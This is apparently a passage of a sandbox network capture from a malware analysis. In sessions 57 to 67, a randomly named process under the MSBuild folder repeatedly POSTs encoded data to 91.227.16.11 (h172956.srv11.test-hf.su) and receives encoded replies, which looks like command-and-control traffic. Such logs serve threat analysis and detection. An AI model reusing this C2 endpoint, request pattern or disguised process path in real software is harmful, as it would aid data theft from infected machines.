                                                                                      57 | 192.168.2.4 | 49801 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:33.309796095 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:33.653975964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:33.654211998 CET | 1872 | OUT | Data Raw: 54 5a 54 58 5b 5c 50 56 5e 57 5a 51 57 51 50 52 54 51 54 5f 56 5f 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TZTX[\PV^WZQWQPRTQT_V_WYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@;*V' >'P:8/=0^$%("<?#?#Y$4;X1?=,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:34.025928020 CET | 435 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 05 26 05 24 0f 34 0d 0d 09 29 13 26 12 2a 21 2a 10 3f 28 25 5c 29 3c 2a 1b 2f 17 30 55 28 38 05 40 23 01 24 1a 22 08 24 54 27 39 20 5c 05 11 27 58 24 1c 04 02 26 3a 3e 03 27 08 29 5b 25 11 38 19 2a 38 32 1e 27 39 05 10 22 23 01 0a 26 5c 23 10 30 11 22 07 2e 2e 23 13 27 2d 2d 54 02 17 21 09 33 3d 3c 5b 3f 1e 27 1f 31 0b 39 14 29 3d 3f 0d 21 5f 37 0e 36 33 04 04 26 06 3d 01 21 22 09 59 3c 3b 23 5a 24 12 34 53 26 14 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-&$4)&*!*?(%\)<*/0U(8@#$"$T'9 \'X$&:>')[%8*82'9"#&\#0"..#'--T!3=<[?'19)=?!_763&=!"Y<;#Z$4S&#U",R?\W0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      58 | 192.168.2.4 | 49802 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:34.477730989 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:34.818795919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:34.819029093 CET | 2544 | OUT | Data Raw: 51 5c 54 5e 5b 5c 55 50 5e 57 5a 51 57 59 50 5a 54 51 54 59 56 5b 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q\T^[\UP^WZQWYPZTQTYV[W[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/W%'36']8^$;'Z&",?",X0'+1.Y,%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:35.191509962 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:35 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      59 | 192.168.2.4 | 49803 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:35.651540995 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:35.996496916 CET | 2548 | OUT | Data Raw: 54 5d 51 5b 5b 5d 55 5c 5e 57 5a 51 57 5c 50 5f 54 52 54 53 56 58 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T]Q[[]U\^WZQW\P_TRTSVXW]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C;W$33;X'$136<;#,&$;%Z&8%Z"!Q*=
                                                                                      Mar 6, 2024 09:53:36.001449108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:36.369654894 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:36 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      60 | 192.168.2.4 | 49804 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:36.836982012 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:37.180258989 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:37.180792093 CET | 2548 | OUT | Data Raw: 51 5b 54 51 5e 5d 55 54 5e 57 5a 51 57 58 50 52 54 50 54 52 56 5a 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[TQ^]UT^WZQWXPRTPTRVZWTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;22W0#*$%:^;1'+,':$P"Z76?#X0 2>;%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:37.552112103 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:37 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      61 | 192.168.2.4 | 49805 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:38.014337063 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:38.359524965 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:38.359833956 CET | 2548 | OUT | Data Raw: 51 5e 54 5f 5e 5c 55 53 5e 57 5a 51 57 5b 50 58 54 5c 54 5c 56 5d 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q^T_^\US^WZQW[PXT\T\V]WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9A,W&$&&-;?6Y$8')$W56<4' &,)/%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:38.732381105 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:38 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      62 | 192.168.2.4 | 49807 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:39.374428034 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:39.717653036 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:39.717894077 CET | 1872 | OUT | Data Raw: 54 5c 54 58 5b 5e 50 51 5e 57 5a 51 57 5e 50 58 54 56 54 52 56 5b 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T\TX[^PQ^WZQW^PXTVTRV[W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C,!%0#!05"^8,2_38?2*?!4T#<7Y34'1:,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:40.089755058 CET | 435 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:39 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 02 25 5d 2f 54 37 33 23 0d 3d 04 31 01 3d 0f 04 5b 2b 5e 22 05 3e 3f 3a 5c 3b 3a 24 56 3d 38 01 06 20 06 28 14 23 22 2f 0e 31 13 20 5c 05 11 24 03 33 31 22 02 30 03 36 02 24 21 36 03 26 01 09 06 2b 3b 2d 00 33 3a 38 03 22 33 2f 0f 26 2a 0d 12 26 3f 07 17 3a 2e 27 1c 26 17 2d 54 02 17 22 55 24 2d 34 5d 28 56 28 03 25 54 21 14 3d 03 23 0a 35 17 24 53 36 0d 0c 00 25 2b 2a 16 20 22 05 58 2b 3b 24 04 24 2c 3c 57 32 2e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-%]/T73#=1=[+^">?:\;:$V=8 (#"/1 \$31"06$!6&+;-3:8"3/&*&?:.'&-T"U$-4](V(%T!=#5$S6%+* "X+;$$,<W2.#U",R?\W0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      63 | 192.168.2.4 | 49808 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:39.496459007 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:39.842035055 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:39.842411041 CET | 2548 | OUT | Data Raw: 54 5f 54 5b 5b 5b 50 57 5e 57 5a 51 57 58 50 5b 54 5c 54 52 56 58 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_T[[[PW^WZQWXP[T\TRVXW_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,1133=]06;2381 V!;!0$71,=/%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:40.214409113 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      64 | 192.168.2.4 | 49809 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:40.678903103 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:41.020140886 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:41.020387888 CET | 2548 | OUT | Data Raw: 51 5d 54 5e 5b 5c 55 54 5e 57 5a 51 57 5b 50 52 54 5c 54 52 56 5d 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q]T^[\UT^WZQW[PRT\TRV]WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9,1!'U&36:_;Y>_082)0W55<#0B<2<=/9%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:41.388299942 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:41 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      65 | 192.168.2.4 | 49810 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:41.857204914 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:42.202788115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:42.203042030 CET | 2544 | OUT | Data Raw: 51 5d 51 59 5e 59 55 56 5e 57 5a 51 57 59 50 5d 54 52 54 5b 56 55 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q]QY^YUV^WZQWYP]TRT[VUW]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C,".V'U>0>-/&^08X1 "+54'B;^2[/%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:42.577083111 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:42 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      66 | 192.168.2.4 | 49811 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:43.038794994 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:43.379976988 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:43.380249977 CET | 2548 | OUT | Data Raw: 54 5b 54 5d 5e 5c 55 5c 5e 57 5a 51 57 58 50 5a 54 56 54 5d 56 5d 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T[T]^\U\^WZQWXPZTVT]V]W_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/.%#136Y8/Y08'%)8V!$U!30'+\%<8)%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:43.748769999 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:43 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      67 | 192.168.2.4 | 49812 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:44.216420889 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:44.562525034 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:44.562808990 CET | 2548 | OUT | Data Raw: 54 5b 51 5c 5e 5b 55 57 5e 57 5a 51 57 5c 50 53 54 57 54 5a 56 5f 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T[Q\^[UW^WZQW\PSTWTZV_W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@,W:U' "0P",_'(%+"Z T5/_0;^1<.];%Z"!Q*=
                                                                                      Mar 6, 2024 09:53:44.933567047 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:44 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
